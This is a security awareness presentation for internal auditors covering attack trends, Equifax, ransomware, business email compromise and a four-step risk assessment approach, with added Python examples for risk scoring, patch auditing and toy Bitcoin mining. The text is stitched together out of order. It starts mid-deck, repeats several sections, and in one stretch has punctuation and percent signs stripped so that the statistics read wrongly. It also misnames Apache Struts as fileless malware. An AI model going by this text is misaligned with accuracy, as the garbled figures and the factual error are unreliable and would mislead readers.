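The Step 1 risk calculation and the four-step controls analysis above (A through D), as an added worked example in Python. It is not code from the presentation or from any Stinnett tool: the scoring formula (asset value × likelihood × impact), the 1 to 5 and 1 to 10 scales, and the sample systems, threats and controls are assumptions for illustration; only the risk > 100 threshold and the count-per-control idea come from the slide.

```python
"""Added example, not from the presentation: a semi-quantitative version of
Step 1 (classify assets, model threats, calculate risk) feeding Step 3
(systems over the threshold, mitigating controls, control counts).
Assumed: value 1..5, likelihood and impact 1..10, risk = value*likelihood*impact."""
from collections import Counter
from dataclasses import dataclass


@dataclass(frozen=True)
class Asset:
    system: str         # information system that holds the data
    data_type: str      # kind of data, per "what value do the assets have"
    value: int          # assumed scale: 1 (public) .. 5 (crown jewels)
    location: str       # where the data lives


@dataclass(frozen=True)
class Threat:
    name: str
    likelihood: int     # assumed scale 1..10
    impact: int         # assumed scale 1..10
    mitigations: tuple  # controls that would reduce this threat


RISK_THRESHOLD = 100    # "calc cybersecurity risk > 100" from Step 3A


def risk_score(asset, threat):
    """Assumed semi-quantitative formula; the maximum is 5 * 10 * 10 = 500."""
    return asset.value * threat.likelihood * threat.impact


def risk_register(assets, threats):
    """Step 1 'Calculated Risk Results': one score per (system, threat) pair."""
    return {(a.system, t.name): risk_score(a, t) for a in assets for t in threats}


def systems_over_threshold(register, threshold=RISK_THRESHOLD):
    """Step 3A/B: for each system, the specific threats scoring over the threshold."""
    over = {}
    for (system, threat), score in register.items():
        if score > threshold:
            over.setdefault(system, []).append(threat)
    return over


def mitigating_control_counts(register, threats, threshold=RISK_THRESHOLD):
    """Step 3C/D: count every (system, threat) instance over the threshold that a
    control would reduce. The highest counts are the controls to implement first."""
    by_name = {t.name: t for t in threats}
    counts = Counter()
    for (system, threat), score in register.items():
        if score > threshold:
            for control in by_name[threat].mitigations:
                counts[control] += 1
    return counts


# Constructed sample data, not a real organization.
ASSETS = [
    Asset("ERP", "bank accounts / vendor master", 5, "on-prem datacenter"),
    Asset("HR portal", "employee records (PII)", 4, "SaaS"),
    Asset("Marketing site", "public content", 1, "cloud"),
]
THREATS = [
    Threat("phishing / BEC", 8, 7,
           ("MFA", "user awareness training", "dual approval for vendor bank changes")),
    Threat("ransomware", 6, 9,
           ("offline backups", "patch management", "endpoint protection")),
    Threat("unpatched internet-facing service", 7, 8,
           ("patch management", "vulnerability scanning")),
]


def sample_analysis():
    """Runs Steps 1 and 3 over the constructed data; returns (over, counts)."""
    reg = risk_register(ASSETS, THREATS)
    return systems_over_threshold(reg), mitigating_control_counts(reg, THREATS)


if __name__ == "__main__":
    over, counts = sample_analysis()
    for system, names in over.items():
        print(f"{system}: {', '.join(names)}")
    for control, n in counts.most_common():   # the "mitigating control counts" chart
        print(f"{n:>3}  {control}")
```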
STEP 4 - CYBERSECURITY REPORTING
• Leverage information gained during the project to provide management with a detailed mapping of the organization's cybersecurity position
• Consider using the COBIT Process Capability Model to map out the CSC framework, which will allow management to begin tracking cybersecurity maturity
5 = OPTIMIZED
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
• NIST SP 800-53 r5, Recommended Security Controls for Federal Information Systems and Organizations
• NIST Cyber Security Framework v1.1
• Various other NIST special publications
Center for Internet Security
• Critical Security Controls (formerly SANS Top 20)
International Organization for Standardization
• ISO 27001 family – Information security management systems
ISACA
• Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matter? Companies with more than 10,000 employees are slightly more likely to have adopted a security framework (90%), but even smaller companies with fewer than 1,000 employees report significant rates of adoption (77%). – Source: itgovernanceusa.com
According to Tenable's Trends in Security Framework Adoption Survey, 84% of organizations in the US leverage a security framework in their organization and 44% use more than one framework. – Source: itgovernanceusa.com
CENTER FOR INTERNET SECURITY – CRITICAL SECURITY CONTROLS
CYBERSECURITY – WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
• Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems. Don't just think SOX
• Confirm IT is not using privileged accounts for daily tasks, which can include browsing the internet or answering email
• Determine whether privileged and admin account passwords are held to a higher standard than normal accounts (complexity, length, change frequency, sharing)
• Consider how IT monitors and is alerted on changes to elevated privileges
User Cybersecurity Training and Awareness
• Companies often fail to implement basic end user training around cybersecurity. Often times the uneducated or untrained end user is the cyber attacker's first entry point into the company
• Determine whether your company conducts random phishing awareness training campaigns
• Evaluate your company's overall cybersecurity training awareness program
CYBERSECURITY – WHAT INTERNAL AUDIT CAN DO
Vulnerability Management
• Most companies fail to implement sound patch management processes and procedures, which includes:
• 99% of exploited vulnerabilities were compromised more than a year after the patch was published
• Companies do not know all of the information devices in their network and therefore are unable to adequately assess their patch management process
• Ensure your IT departments are scanning all assets continuously to ensure newly discovered vulnerabilities are identified quickly
• Validate the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor. This includes workstations, servers, network equipment, VMware, Citrix, non-Microsoft software, etc.
• If known vulnerabilities cannot be patched due to business reasons, determine whether those risks are formally accepted and tracked by management. Assess whether there are sufficient mitigating controls in place
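The three vulnerability management checks on this slide (unknown devices, scan coverage, patch age with formally accepted exceptions) run over a constructed inventory, as an added example that is not part of the presentation or any vendor tool. Hostnames, dates, the 365-day age limit (taken from the "more than a year after the patch" statistic) and the field layout are all assumptions.

```python
"""Added example, not from the presentation: patch management audit checks over
a constructed asset inventory, scan results and risk acceptance register.
Hostnames, dates, the 365-day age limit and the record layout are assumed."""
from dataclasses import dataclass
from datetime import date


@dataclass(frozen=True)
class Finding:
    host: str
    issue: str
    detail: str


# Constructed data. INVENTORY is what the CMDB says exists; SCAN is what the
# vulnerability scanner actually found: host -> (type, vendor patch release
# date, date the patch was applied, or None if it is still missing).
INVENTORY = {"fileserver01", "dc01", "vpn-gw", "citrix01", "hvac-ctl"}
SCAN = {
    "fileserver01":  ("server", date(2018, 3, 14), date(2018, 4, 2)),
    "dc01":          ("server", date(2018, 3, 14), None),
    "vpn-gw":        ("network", date(2017, 1, 10), None),
    "citrix01":      ("server", date(2018, 1, 9), None),
    "printer-lobby": ("iot", date(2016, 5, 3), None),    # unknown to the CMDB
}
INTERNET_FACING = {"vpn-gw"}
# Formally accepted risks, host -> (accepting owner, next review date).
RISK_ACCEPTANCE = {"citrix01": ("Application Owner", date(2019, 1, 15))}
AS_OF = date(2019, 2, 1)   # constructed audit date


def audit_patching(inventory, scan, accepted, internet_facing, today, max_age_days=365):
    """Returns a list of Findings; an empty list means every check passed."""
    findings = []
    # Check 1: devices the scanner sees but the inventory does not. You cannot
    # assess a patch process for devices you do not know you have.
    for host in sorted(set(scan) - inventory):
        findings.append(Finding(host, "not in asset inventory", "found by scan only"))
    # Check 2: inventory entries no scan has covered, so scanning is not continuous.
    for host in sorted(inventory - set(scan)):
        findings.append(Finding(host, "not covered by vulnerability scanning", ""))
    # Check 3: missing patches, rated by age since vendor release and exposure.
    # Risks management formally accepted are tracked rather than reported,
    # unless the acceptance is past its review date.
    for host, (kind, released, applied) in sorted(scan.items()):
        if applied is not None:
            continue
        if host in accepted:
            owner, review = accepted[host]
            if review < today:
                findings.append(Finding(host, "risk acceptance expired",
                                        f"owner {owner}, review due {review}"))
            continue
        age = (today - released).days
        severity = "HIGH" if (age > max_age_days or host in internet_facing) else "MEDIUM"
        findings.append(Finding(host, f"{severity}: unpatched {age} days", kind))
    return findings


def sample_audit():
    return audit_patching(INVENTORY, SCAN, RISK_ACCEPTANCE, INTERNET_FACING, AS_OF)


if __name__ == "__main__":
    for f in sample_audit():
        print(f"{f.host:<14} {f.issue:<40} {f.detail}")
```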
CYBERSECURITY – SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANY
• Obtain a basic understanding of your critical information assets, where they are stored and how they are protected
• Perform an inventory of IT devices and assess each device's risk relating to patches
• Understand your company's fundamental process around patch management and focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe, Java, browsers, operating systems)
• Perform an inventory of all user and admin IDs. Understand the access each ID has in your environment and why that access level is necessary. Assess whether password levels and parameters are adequate (password length, characters and change interval)
• Implement a continual end user training program
• Ensure backups and recovery plans work as intended and are properly segregated
• Understand the coverage and terms of your company's cyber insurance policy
• Assess the requirement for multi-factor authentication
ANATOMY OF AN ATTACK
QUESTIONS
David Losacco, Principal. Mobile: (918) 625-8870
davidlosaccostinnett-associatescom
Stinnett & Associates, stinnett-associates.com
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
8
AS AUDITORS WHY DO WE CARE
Sources 2018 Global Megatrends in Cybersecurity
bull 51 of data breaches are caused by Organized Cyber Crime 18 are caused by Nation-States
bull 70 of cyber attacks and data breaches go undetected
bull 69 of organizations learn of their breach from an outside entity such as law enforcement customers or suppliers
bull In 2017 there were over 130 large-scale targeted breaches in the US per year and that number is growing by 27 percent per year
bull Small and mid-size businesses make up 43 of cyber crime targets
bull Cyber Crime costs estimated to reach $6 Trillion by 2021
bull 77 of organizations do not have a formal Cybersecurity Incident Response Plan
bull 147900000 consumer records impacted by Equifax breach in 2017 US Population is 327 Million
bull In 1st Quarter of 2017 60 of malware payloads were ransomware By the end of 2018 ransomwareaccounted for only 5 of malware
bull ldquoFilelessrdquo malware attacks increased 432 in 2017
bull Cyrptojacking attacks increased 8500 in 2017
Security compromises are a persistent business risk
9
THEY WANT OUR MONEY
Financial Gain is still the 1 factor for cyber attacks and breaches at over 75 in 2017 Espionage and other factors combined still make up less than 25
bull Personally Identifiable Information (PII) is worth more on the black market (ldquoThe Dark Webrdquo) than Credit Card Numbers
bull Ransomware payments estimated over $1 billion in 2017 70 of all Ransomware was paid
bull Email scams cost businesses over $12 Billion in 2018
bull 10 of laundered money is attributable to cyber crime That number is $200 Billion
Source Verizon Data Breach Investigations Report 2018
10
HOW DO THEY DO IT
Cyber criminals have multiple means to achieve Financial Gain
bull Theft of funds (Bank Accounts)
bull Extortion (Ransomware)
bull Selling of stolen credit cards
bull Selling of PII and PHI data
bull Insider Trading Information
bull Using compromised environment for other attacks or for rent (Cryptojacking)
11
EVERCHANGING LANDSCAPE
The types of cyber attacks and exploits are changing
bull Server Attacks once at 50 are trending down
bull User Device and Person attacks are both trending upward at nearly same pace due to Malware Ransomware and Phishing attacks
COMMON TERMS AND DEFINITIONSInformation Technology (IT) ndash The corporate department that handles the corporate software and hardware that runs the normal functions of a typical business or enterprise The department within a company that is charged with establishing monitoring and maintaining information technology systems and services
Operational Technology (OT) ndash The hardware and software that detects or causes a change through the direct monitoring andor control of physical devices processes and events in the enterprise OT technology and departments are usually found within manufacturing and industrial environments and include Industrial Control Systems (ICS) such as Supervisory Control and Data Acquisition systems (SCADA) OT devices and environments are typically run separately from IT departments These are the devices that communicate with pipelines and electrical grids (and nuclear power plants)
Internet of Things ndash A computing concept that describes the idea of everyday physical devices (DVR systems thermostats refrigerators vehicles) being connected to the internet and being able to identify themselves to other devices which enable the devices to collect and exchange data
12
13
ATTACKS IN THE HEADLINES
httpswwwbusinessinsidercomhackers-stole-a-casinos-database-through-a-thermometer-in-the-lobby-fish-tank-2018-4
httpsjsiswashingtonedunewscyberattack-critical-infrastructure-russia-ukrainian-power-grid-attacks
14
COMMON TERMS AND DEFINITIONSBot ndash A bot is a software ldquorobotrdquo that performs an extensive set of automated tasks on its own Bots can perform an extensive set of destructive tasks as well as introduce many forms of malware to your system or network They can also be used by black hats to coordinate attacks by controlling botnets
Botnet ndash A number of Internet-connected devices (eg computers DVR systems and other devices) after being infected with malware each of which is running one or more bots Botnets can be used to perform Distributed Denial Of Service Attack steal data send spam and allow the attacker access to the device and its connection Botnets can be rented out to other hackers or cyber criminals
Denial of Service(DOS) and Distributed Denial of Service ndash A type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic A Distributed DOS is the same as a DOS attack but involves multiple computers attacking the network from multiple locations Typically the computers being used are infected with Botnet
15
ATTACKS IN THE HEADLINES
httpswwwcsoonlinecomarticle3258748the-mirai-botnet-explained-how-teen-scammers-and-cctv-cameras-almost-brought-down-the-internethtml
httpswwwwiredcomstoryreaper-iot-botnet-infected-million-networks
16
COMMON TERMS AND DEFINITIONSMiddleware ndash Software that facilitates exchange of data between two application programs within the same environment or across different hardware and network environments Three basic types of middleware are (1) communication middleware (2) database middleware and (3) system middleware
Man-in-the-Middle (MITM) Attacks ndash An attack occurrence where the attacker has been able to place themselves in the middle of communications between two parties The Attacker is able to alter or obtain data for themselves while unknown to the other two parties
SQL Injection and Cross-site scripting Attacks ndash An attack occurrence where the attacker injects malicious code into a website In SQL Injection the attacker uses SQL language to obtain information back from the website that was unintended In Cross-site scripting the attacker injects code that only impacts other users of website
17
ATTACKS IN THE HEADLINES
httpswwwzdnetcomarticleman-in-the-middle-flaw-left-smartphone-banking-apps-vulnerable
httpskrebsonsecuritycom201809secret-service-warns-of-surge-in-atm-wiretapping-attackscomment-page-1httpswwwscmagazinecomhomesecurity-newscisco-patches-prime-license-
manager-sql-injection-vulnerability
httpswwwtechrepubliccomarticlebritish-airways-data-theft-demonstrates-need-for-cross-site-scripting-restrictions
18
COMMON TERMS AND DEFINITIONS

Common Vulnerabilities and Exposures (CVE) - Catalog sponsored by Homeland Security that documents known cyber threats. Vulnerabilities are known errors in a system or software that provide an attacker with direct access. Exposures are known errors that allow an attacker indirect access, which may allow the attacker to gather knowledge or content. Many of the malware and cyber attacks in the news resulted from attackers utilizing a vulnerability that had been known and fixed by the vendor for several months or years but not fixed at the company level.

Zero Day Vulnerability/Attack - An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider. Zero day vulnerabilities are the most difficult to protect against and detect due to the lack of knowledge and support by the vendor.

Advanced Persistent Threat - A set of stealthy and continuous computer hacking processes, often orchestrated by a person or persons targeting a specific entity.
MALWARE

Malware is short for malicious software. Malware is a broad term that encompasses computer viruses, worms, Trojan horses, spyware, adware and ransomware. Malware is designed to interfere with normal computer operation, usually giving hackers a chance to gain access to your computer and collect sensitive personal information.

• Malware is seen as the first access point used in connection with hacking attempts
• Ransomware is a version of malware that has been in the headlines
• Malware can grant command and control of a device to the hackers
• 1 in 131 emails contained malware in 2016
• "Fileless" malware is a new variant that is more difficult to detect
COMPLEXITY BEHIND THE EQUIFAX ATTACK

• Attack started early March 2017 with hackers using a bot programmed to search the web for a recently released CVE (Common Vulnerabilities and Exposures entry)
• Took the hackers two months before they found the vulnerability on one of Equifax's websites used to help customers with claims
• Hackers then used another vulnerability (a fileless malware named Apache Struts) that was also a CVE that had been issued a month before but never fixed
• Hackers spent an estimated 76 days in the network and downloaded records from 51 different databases
• Over 148 million records were stolen
• Attack was not identified until July 30, 2017
EQUIFAX - WHAT WAS LOST

In addition to US consumers, the UK Data Protection Authority, the Information Commissioner's Office, reported:
• Approximately 20,000 UK data subjects had names, dates of birth, telephone numbers and driving license numbers exposed
• More than 600,000 UK data subjects had names, dates of birth and telephone numbers exposed
• Up to 15 million UK data subjects had names and dates of birth exposed
COMMON TERMS AND DEFINITIONS

Dark Web / Darknet - Websites located on the internet that are not accessible by normal search engines or means. Darknet sites require special software such as TOR (The Onion Router) that helps keep users anonymous. Darknet sites are used for several illegal activities such as black market purchasing of stolen PII or credit card data, as well as botnet rentals. Bitcoins are traded on the Dark Web.

Bitcoin - A digital currency created in 2009. There are no physical bitcoins, only balances kept on a public ledger in the cloud that, along with all Bitcoin transactions, is verified by a massive amount of computing power. Bitcoin mining is the process through which bitcoins are released into circulation; it involves solving a computationally difficult puzzle to discover a new block, which is added to the blockchain, and receiving a reward in the form of a few bitcoins. As more and more bitcoins are created, the difficulty of the mining process, that is, the amount of computing power involved, increases.
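To make the mining puzzle concrete, here is an added worked example (written for this page, not part of the presentation or Stinnett & Associates' material) of a toy proof-of-work search in Python. The header bytes and difficulty levels are constructed; real Bitcoin uses an 80-byte header and a 256-bit target, but the mechanism, hashing candidate blocks until one falls under the target, is the same.

```python
import hashlib


def block_hash(header: bytes, nonce: int) -> bytes:
    """Bitcoin hashes the block header twice with SHA-256; the nonce is the
    field miners vary while searching for a valid block."""
    data = header + nonce.to_bytes(4, "little")
    return hashlib.sha256(hashlib.sha256(data).digest()).digest()


def meets_target(digest: bytes, difficulty_bits: int) -> bool:
    """The puzzle: read the hash as a 256-bit number and require it to fall
    below 2**(256 - difficulty_bits), i.e. to start with that many zero bits.
    Checking one candidate costs one hash; finding a winner is expected to
    take about 2**difficulty_bits hashes, which is where the computing power goes."""
    return int.from_bytes(digest, "big") < (1 << (256 - difficulty_bits))


def mine(header: bytes, difficulty_bits: int, max_nonce: int = 1 << 32):
    """Sequentially try nonces until the target is met.
    Returns (winning_nonce, hashes_tried), or None if the nonce space is exhausted."""
    for nonce in range(max_nonce):
        if meets_target(block_hash(header, nonce), difficulty_bits):
            return nonce, nonce + 1
    return None


def expected_hashes(difficulty_bits: int) -> int:
    """Average work per block at a given difficulty; every extra bit doubles it."""
    return 1 << difficulty_bits


# Constructed header for the demo: a real header carries the previous block
# hash, merkle root, timestamp and target, none of which matter for the puzzle.
DEMO_HEADER = b"prev-block-hash|merkle-root|2019-03-04T00:00:00Z|"

if __name__ == "__main__":
    for bits in (4, 8, 12, 16):
        nonce, tried = mine(DEMO_HEADER, bits)
        digest = block_hash(DEMO_HEADER, nonce).hex()
        print(f"{bits:2d} leading zero bits: nonce={nonce:7d} hashes tried={tried:7d} "
              f"(expected ~{expected_hashes(bits):6d})  hash={digest[:16]}...")
```

Running it shows the asymmetry the definition relies on: the number of hashes tried climbs roughly sixteen-fold for every four extra difficulty bits, while anyone can verify the winning nonce with a single hash.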
RANSOMWARE

A type of malware that prevents or limits users from accessing their system, either by locking the system's screen or by locking the users' files, unless a ransom is paid. Ransomware typically encrypts certain file types on infected systems and forces users to pay the ransom through certain online payment methods to get a decryption key.

• The use of Bitcoin is typically the payment method
• Ransomware attacks were growing at a rate of 350% annually until 2017 and have now dropped, but are still present (HR and Healthcare companies both in February)
• The WannaCry ransomware attack impacted over 200,000 people across 150 countries (included a worm)
RANSOMWARE

Ransomware-as-a-Service (RaaS) allows any amateur attacker to get into the business with basic knowledge and less effort. The amateur attacker can visit a RaaS site on the dark web and set up an account to create the ransomware package. It is up to the attacker to distribute the ransomware, while the RaaS will handle the ransom payments. The RaaS developer takes a cut of any payments that are made. The developer will also reduce their cut depending on the volume of payments received.
BUSINESS EMAIL COMPROMISE (BEC)

• Business Email Compromise (BEC) is an exploit targeting a company's corporate email accounts and impersonating or "spoofing" the email identity of an employee or company executive in order to fraudulently obtain money or sensitive information from the company, its business partners and/or employees
• The FBI's Internet Crime Complaint Center, or IC3, said that based on fraud reports submitted from October 2013 to May 2018 there were 41,058 total US victims of BEC schemes, which collectively lost at least $2.9 billion, while global losses were more than four times that amount (FBI: Global Business Email Compromise Losses Hit $12.5 Billion)
• BEC exploits have become so concerning that the SEC issued a Report of Investigation in October 2018 (https://www.sec.gov/litigation/investreport/34-84429.pdf). The report was considered a "highly unusual action" by the SEC and identified nine companies that had been specifically investigated by the SEC due to a BEC incident
  • All nine lost at least $1 million due to a BEC scam
  • Two companies lost more than $30 million each
  • In total the nine issuers lost almost $100 million
BEC & PHISHING

Phishing - A form of social engineering in which a message, typically an email with a malicious attachment or link, is sent to a victim with the intent of tricking the recipient into opening the attachment.

Spear Phishing - Phishing attacks directed at a specific individual or company. Sub-categories of spear phishing include Cloning (using a previous legitimate email) and Whaling (attacking a high-level executive).
• CEO email to Treasurer
• HR phishing for employee data
• W-2 phishing data (IRS sent out a warning)

The majority of phishing cases are used as a means to install malware onto a host environment.
PHISHING EMAIL EXAMPLE

Most companies battle the increased phishing and spear-phishing attacks by labeling each external email with some form of the following inserts:

[Image: examples of external email warning labels]

This "band-aid" is still widely in practice today, however.
BEC & OFFICE 365

• Office 365 is Microsoft's cloud-based solution offering everything from email and Excel to cloud storage
• Microsoft Office 365 is now in use at over 70% of Fortune 500 companies
• 20% of all companies use Office 365
• Office 365 overtook Office products in the 4th quarter of 2017 as the largest revenue stream for Microsoft
• Most companies do not correctly set up Office 365 security or logging
• Significant increase in attack vectors against Office 365
• It only takes one employee and the hacker is internal to email and Office 365
• Some attack vectors do not require a phishing email
BEC ATTACK WALKTHROUGH
BEC - PROTECT YOUR CASH

Accounting controls at all entry/exit points for cash:

Cash Receipts
• Review of balances over 60 days and $10k - a triggered review and communication uncovered a change in bank info (communication was being sent to a deleted email)
• Reports that generate overdue receivables timely for follow-up
• Elevation rules for overdue receivables

Cash Disbursements
• SOD - limit access to the vendor master file
• Controls related to changing bank info for all vendors - need more than email communication; personal verification with the vendor requesting the change
• Vendor set-up - verification of the information provided
• ISNetworld - vetting process for vendors; could require vetting prior to set-up as vendors
• ACH debits - no reason to give debit access to an account; if done, dual approval and a ZBA should be used
• Multi-factor authentication

Other Processes to Consider
• Treasury
• Payroll
• Royalties
• Cyber Insurance
• Legal Liabilities
• Contract Language
• SOX Impact
AND MULTI-FACTOR AUTHENTICATION

• Google has not had any of its 85,000+ employees successfully phished on their work-related accounts since early 2017, when it began requiring all employees to use physical security keys in place of passwords and one-time codes
• Office 365 and other cloud-based services should all use multi-factor authentication
BARRIERS TO EFFECTIVE CYBERSECURITY

Many companies do not know where to start with cybersecurity, how to evaluate what is enough, or how to recover when their best efforts still result in a cyber breach.

Main reasons for companies' struggles are:
• Lack of skilled resources (people and time)
• Lack of funds
• Continued innovations in technology
• Expansion of the attack surface
• Lack of understanding of the company's information assets and their value
• Failure to properly understand threats and risks
• Failure to implement core security protocols and procedures
DEFENSE IN-DEPTH APPROACH

The Defense-in-Depth approach to cybersecurity is a layered approach that recognizes a company's first line of defense may fail and integrates multiple layers of defense around a company's information assets. Also called the Castle Approach (once you breach the walls, more defenses are in place).
CYBERSECURITY DEFENSE IN-DEPTH

Layers to evaluate:
• Patch Management
• Operating System EOL
• Network Vulnerability Scanning
• Security Staffing
• Internal & External Network Boundaries
• Wireless Security
• Firewall Implementation and Monitoring (including NextGen)
• IPS / IDS / SIEM Implementations
• Firewall Dataflow & Standards Documentation
• Cloud Service Provider Evaluations
• Security Incident Management
• Physical Security
• Evaluation of Encryption Technologies
• Network Access Control
• Workstation Endpoint Protection

PEOPLE / TECHNOLOGY / PROCESSES

THE PEOPLE CHALLENGE - Humans remain one of the weakest links in the security chain. Ensure you have a strong security awareness training program.

THE TECHNOLOGY CHALLENGE - The increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential.

THE PROCESS CHALLENGE - Ensure best practice processes and associated management frameworks are in place. Regular audits and reviews are important.
WHERE AUDIT CAN HELP

Step 1 - Identify risks through a formal risk assessment of assets
Step 2 - Perform a baseline gap analysis of the current control environment against industry standard frameworks and identify controls which need to be implemented to reduce the risk of cybersecurity incidents affecting critical data assets
Step 3 - Make recommendations on implementation and ongoing management of cybersecurity controls
Step 4 - Follow-up reviews to monitor control implementation progress
Repeat

Cycle: Risk Assessments -> Create a Baseline/Gap Analysis -> Implement and Manage Controls -> Assess & Report -> repeat
STEP 1 - CYBERSECURITY RISK ASSESSMENT

• Perform risk assessments to understand the organizational risk and where high-risk assets exist
• Risk assessments should include interviews of departments outside of IT to ensure all critical data asset types are identified
• Work with IT to classify each of the asset types to assist in measuring the overall risk of a cybersecurity event
• Consider using a threat modeling tool to semi-qualitatively measure cybersecurity risks, to identify, estimate and prioritize information security risks
STEP 1 - CYBERSECURITY RISK ASSESSMENT

Identification of Assets -> Asset Locations -> Classification of Assets -> Threat Modeling -> Calculated Risk Results

Key to an effective cybersecurity program is to understand the Company's information assets:
• What value do the assets have?
• Credit card data
• Employee or customer records
• Bank accounts
• Intellectual property
• Trade secrets
• Insider knowledge
• Data location
• Cash in / cash out processes
• Who would want the data?
STEP 1 - CYBERSECURITY RISK ASSESSMENT

• Through formal risk assessments with all critical functions in the business, identify where data lives and how the data should be classified, then perform a threat analysis to semi-qualitatively determine the risk of a particular cybersecurity incident occurring. This allows you to determine the critical data assets in your environment that are at most risk of a cybersecurity incident
• Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business

[Screenshot: example of a critical data asset risk assessment]
STEP 2 - BASELINE GAP ANALYSIS

• Perform walkthroughs with the information technology department to understand the cybersecurity controls in place
• Evaluate control design as it relates to commonly accepted framework(s)
• Identify control gaps and create a baseline for cybersecurity maturity in the organization
• Use the cybersecurity maturity baseline and risk assessment results to identify and prioritize controls to implement, including the highest priority, most impactful controls that should be implemented first
STEP 3 - CONTROLS ANALYSIS

• The baseline gap analysis facilitates the identification of controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment)
• Work with IT management to identify realistic and feasible mitigating controls and an implementation roadmap

[Chart: Mitigating Control Counts - the number of instances in which each mitigating control reduced a risk]

Method behind the chart:
A) Identify information systems with calculated cybersecurity risk > 100
B) Does the information system have the SPECIFIC THREAT cybersecurity risk over 100 (Yes / No)? If yes, move to the next step
C) Identify mitigating controls to implement to mitigate the threat
D) Total all instances where controls reduced risk
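As an added illustration of Steps 1 to 3 (this is example code written for this page, not the presentation's own tool or the screenshot it refers to), the following Python script scores each asset/threat pair, keeps the pairs above the slide's threshold of 100, and tallies how many of those risks each mitigating control reduces, which is the count the chart above plots. The scoring formula, the 1-10 and 1-5 scales, the asset and threat lists, and the threat-to-control mapping are all assumptions made for the example.

```python
from collections import Counter
from dataclasses import dataclass

# Assumed scoring model (the slide does not state its formula):
# risk = asset value (1-10) x threat likelihood (1-5) x impact (1-5), max 250.
# The slide's threshold of 100 is kept as the trigger for a mitigating control.
RISK_THRESHOLD = 100


@dataclass(frozen=True)
class Asset:
    name: str
    location: str          # where the data lives (Step 1)
    classification: str    # how the data is classified (Step 1)
    value: int             # 1-10, from the asset valuation
    internet_facing: bool


@dataclass(frozen=True)
class Threat:
    name: str
    likelihood: int        # 1-5
    impact: int            # 1-5
    internet_facing_only: bool = False   # threat applies only to exposed systems


# Assumed threat-to-control mapping; control labels follow the Defense-in-Depth list.
MITIGATING_CONTROLS = {
    "Ransomware": ["Backups and recovery", "Endpoint protection", "Patch management"],
    "Phishing / BEC": ["Security awareness training", "Multi-factor authentication"],
    "Unpatched internet-facing service": ["Patch management", "Network vulnerability scanning"],
}


def risk_score(asset: Asset, threat: Threat) -> int:
    return asset.value * threat.likelihood * threat.impact


def applies(asset: Asset, threat: Threat) -> bool:
    """Step B: does this SPECIFIC threat apply to this information system?"""
    return asset.internet_facing or not threat.internet_facing_only


def assess(assets, threats):
    """Steps A and B: every asset/threat pair whose calculated risk exceeds the threshold."""
    return [
        (a.name, t.name, risk_score(a, t))
        for a in assets
        for t in threats
        if applies(a, t) and risk_score(a, t) > RISK_THRESHOLD
    ]


def control_counts(findings) -> Counter:
    """Steps C and D: tally every instance in which a control reduces a flagged risk."""
    counts = Counter()
    for _asset, threat, _score in findings:
        for control in MITIGATING_CONTROLS.get(threat, []):
            counts[control] += 1
    return counts


def prioritized_controls(findings):
    """Controls ordered by how many flagged risks they reduce (ties alphabetical):
    the implementation order Step 3 recommends."""
    counts = control_counts(findings)
    return [c for c, _n in sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))]


# Constructed sample data for illustration only.
ASSETS = [
    Asset("Payroll database", "on-prem SQL cluster", "PII", 10, False),
    Asset("Vendor master file", "ERP", "Financial", 8, False),
    Asset("Customer claims portal", "DMZ web tier", "PII", 9, True),
    Asset("Marketing website", "hosted CMS", "Public", 3, True),
]
THREATS = [
    Threat("Ransomware", 4, 5),
    Threat("Phishing / BEC", 5, 3),
    Threat("Unpatched internet-facing service", 4, 4, internet_facing_only=True),
]

if __name__ == "__main__":
    findings = assess(ASSETS, THREATS)
    for asset, threat, score in findings:
        print(f"{score:4d}  {asset:25s} {threat}")
    for control, n in control_counts(findings).most_common():
        print(f"{n:3d} instances mitigated by {control}")
```

With the constructed data, patch management comes out on top because it mitigates both the ransomware and the unpatched-service threats, which is exactly the kind of cross-threat leverage the slide's "greatest number of critical data assets" wording is after.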
STEP 4 - CYBERSECURITY REPORTING

• Leverage information gained during the project to provide management with a detailed mapping of the organization's cybersecurity position
• Consider using the COBIT Process Capability Model to map out the CSC framework, which will allow management to begin tracking cybersecurity maturity

COBIT capability levels:
5 = OPTIMIZED
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
CYBERSECURITY FRAMEWORKS AND GUIDANCE

NIST
• NIST SP 800-53 r5, Recommended Security Controls for Federal Information Systems and Organizations
• NIST Cyber Security Framework v1.1
• Various other NIST special publications

Center for Internet Security
• Critical Security Controls (formerly SANS Top 20)

International Organization for Standardization
• ISO 27001 family - Information security management systems

ISACA
• Implementing the NIST Cybersecurity Framework Using COBIT 5

Does company size matter? Companies with more than 10,000 employees are slightly more likely to have adopted a security framework (90%), but even smaller companies with fewer than 1,000 employees report significant rates of adoption (77%). - Source: itgovernanceusa.com

According to Tenable's Trends in Security Framework Adoption Survey, 84% of organizations in the US leverage a security framework in their organization and 44% use more than one framework. - Source: itgovernanceusa.com
CENTER FOR INTERNET SECURITY - CRITICAL SECURITY CONTROLS
CYBERSECURITY - WHAT INTERNAL AUDIT CAN DO

User and Administrator Level Access
• Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems. Don't just think SOX
• Confirm IT is not using privileged accounts for daily tasks, which can include browsing the internet or answering email
• Determine whether privileged and admin account passwords are held to a higher standard than normal accounts (complexity, length, change frequency, sharing)
• Consider how IT monitors and is alerted on changes to elevated privileges

User Cybersecurity Training and Awareness
• Companies often fail to implement basic end user training around cybersecurity. Often the uneducated or untrained end user is the cyber attacker's first entry point into the company
• Determine whether your company conducts random phishing awareness training campaigns
• Evaluate your company's overall cybersecurity training and awareness program
